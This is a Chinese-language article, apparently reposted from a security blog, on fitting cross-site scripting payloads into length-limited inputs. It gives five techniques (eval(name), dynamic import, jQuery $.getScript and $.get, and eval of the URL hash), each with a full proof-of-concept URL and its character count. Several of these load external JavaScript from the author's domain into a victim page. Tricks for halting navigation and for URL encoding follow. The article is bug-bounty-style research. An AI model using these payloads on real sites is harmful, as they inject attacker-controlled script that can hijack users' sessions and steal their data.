输入长度受限情况下的 XSS 攻击

栏目: JavaScript · 发布时间: 5年前

内容简介:在很多攻击和测试下执行JavaScript时会发现无法alert,因为alert限制了字符数。研究人员在HackerOne上看到一个相同情况的报告,该作者虽然成功执行了任意JavaScript代码,但是过程比较复杂而且需要用户交互。因此研究人员写了本文。作者认为XSS的POC应该是从攻击者所控制的域名来加载外部JavaScript,本文讲述如何以最少的字符加载外部JavaScript。首先假设payload在

在很多攻击和测试下执行JavaScript时会发现无法alert,因为alert限制了字符数。研究人员在HackerOne上看到一个相同情况的报告,该作者虽然成功执行了任意JavaScript代码,但是过程比较复杂而且需要用户交互。因此研究人员写了本文。

作者认为XSS的POC应该是从攻击者所控制的域名来加载外部JavaScript,本文讲述如何以最少的字符加载外部JavaScript。

首先假设payload在 href 属性中,也就是说payload被限制在32个字符以内:

<a href="<INJECTION>">Click</a>

1. eval(name)

这可能是可以执行任意代码的最短payload了。Name属性可以分配任何内容,而且是继承跨域的。这样攻击者就可以在没有任何限制的情况下执行payload了,如果页面重写了name属性的情况除外。

POC:

https://attacker.cm2.pw/?xss=<script>name="d=document;s=d.createElement('script');s.src='//cm2.pw';d.body.appendChild(s)";open('//victim.cm2.pw/?xss=<a href="javascript:eval(name)">Click</a>','_self')</script>

输入长度受限情况下的 XSS 攻击

Payload长度:21

'javascript:eval(name)'.length==21

2. import

这是取回外部JavaScript的最短payload之一,但只工作在基于chromium的浏览器上。

POC:

https://victim.cm2.pw/?xss=<a href="javascript:import(/\㎠.㎺/)">Click</a>

输入长度受限情况下的 XSS 攻击

Payload长度:24

'javascript:import(/\㎠.㎺/)'.length==24

3. $.getScript

这是一个加载外部JavaScript的著名jQuery函数。该脚本取回后是在全局环境下执行的,就像在script标签中加载一样。但这种情况需要在一个有漏洞的页面中已经加载了jQuery。

POC:

https://victim.cm2.pw/?xss=<script src='https://code.jquery.com/jquery-3.3.1.min.js'></script><a href="javascript:$.getScript(/\cm2.pw/)">Click</a>

输入长度受限情况下的 XSS 攻击

Payload长度:29

'javascript:$.getScript(/\㎠.㎺/)'.length==29

4. $.get

如果返回 content-type 被设置为 text/javascript ,就可以加载和执行外部JavaScript。该漏洞只在jQuery 3.00及以前版本有效。

POC:

https://victim.cm2.pw/?xss=<script src='https://code.jquery.com/jquery-2.2.4.min.js'></script><a href="javascript:$.get(/\cm2.pw/)">Click</a>

输入长度受限情况下的 XSS 攻击

Payload长度:23

'javascript:$.get(/\㎠.㎺/)'.length==23

5. 使用已有的elements和properties

我们很容易就可以在HTML元素和JavaScript属性中找到用户部分或完全控制的内容。虽然这需要进行仔细地检查,但对输入长度受限的情况下利用XSS是非常有帮助的。比如,很多Ajax驱动的应用会保存 hash identifier 来进行导航等。

如果页面存储这样的哈希值:

const hash = document.location.hash;

可以用这些的脚本来加载:

eval("'"+hash)

POC:

https://victim.cm2.pw/?xss=<script>const hash=document.location.hash;</script><a href="javascript:eval(`'`%252bhash)">Click</a>#';d=document;s=d.createElement('script');s.src='//cm2.pw';d.body.appendChild(s)

输入长度受限情况下的 XSS 攻击

Payload长度:25

javascript:eval("'"+hash)`.length==25

还有很多其他的方法可以用来加载外部JavaScript,比如:

  • 其他库;
  • 使用不同的选择器;
  • 使用DOM特性等。

比如,在点击了JavaScript URI后,Firefox会导航navigation。为了预防navigation,需要引入一个 error 。可以在每个payload后计入 ;q 这样的内容,比如:

javascript:eval(name);q
// halts navigation because q is not defined
//因为q没有被定义,因此导航会被终止

最后,需要注意的是也可以在JavaScript URL环境中使用URL编码,比如:

<a href="javascript:x='%27,alert(1)//">Click</a>

POC:

https://cm2.pw/?xss=<a href="javascript:x='%2527,alert(1)//">Click</a>

输入长度受限情况下的 XSS 攻击

https://blog.cm2.pw/length-restricted-xss/


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

JavaScript DOM编程艺术

JavaScript DOM编程艺术

Jeremy Keith / 杨涛、王建桥、杨晓云 / 人民邮电出版社 / 2006年12月 / 39.00元

本书讲述了JavaScript和DOM的基础知识,但重点放在DOM编程技术背后的思路和原则:预留退路、循序渐进和以用户为中心等,这些概念对于任何前端Web开发工作都非常重要。本书将这些概念贯穿在书中的所有代码示例中,使你看到用来创建图片库页面的脚本、用来创建动画效果的脚本和用来丰富页面元素呈现效果的脚本,最后结合所讲述的内容创建了一个实际的网站。 本书适合Web设计师和开发人员阅读。一起来看看 《JavaScript DOM编程艺术》 这本书的介绍吧!

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具

随机密码生成器
随机密码生成器

多种字符组合密码

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器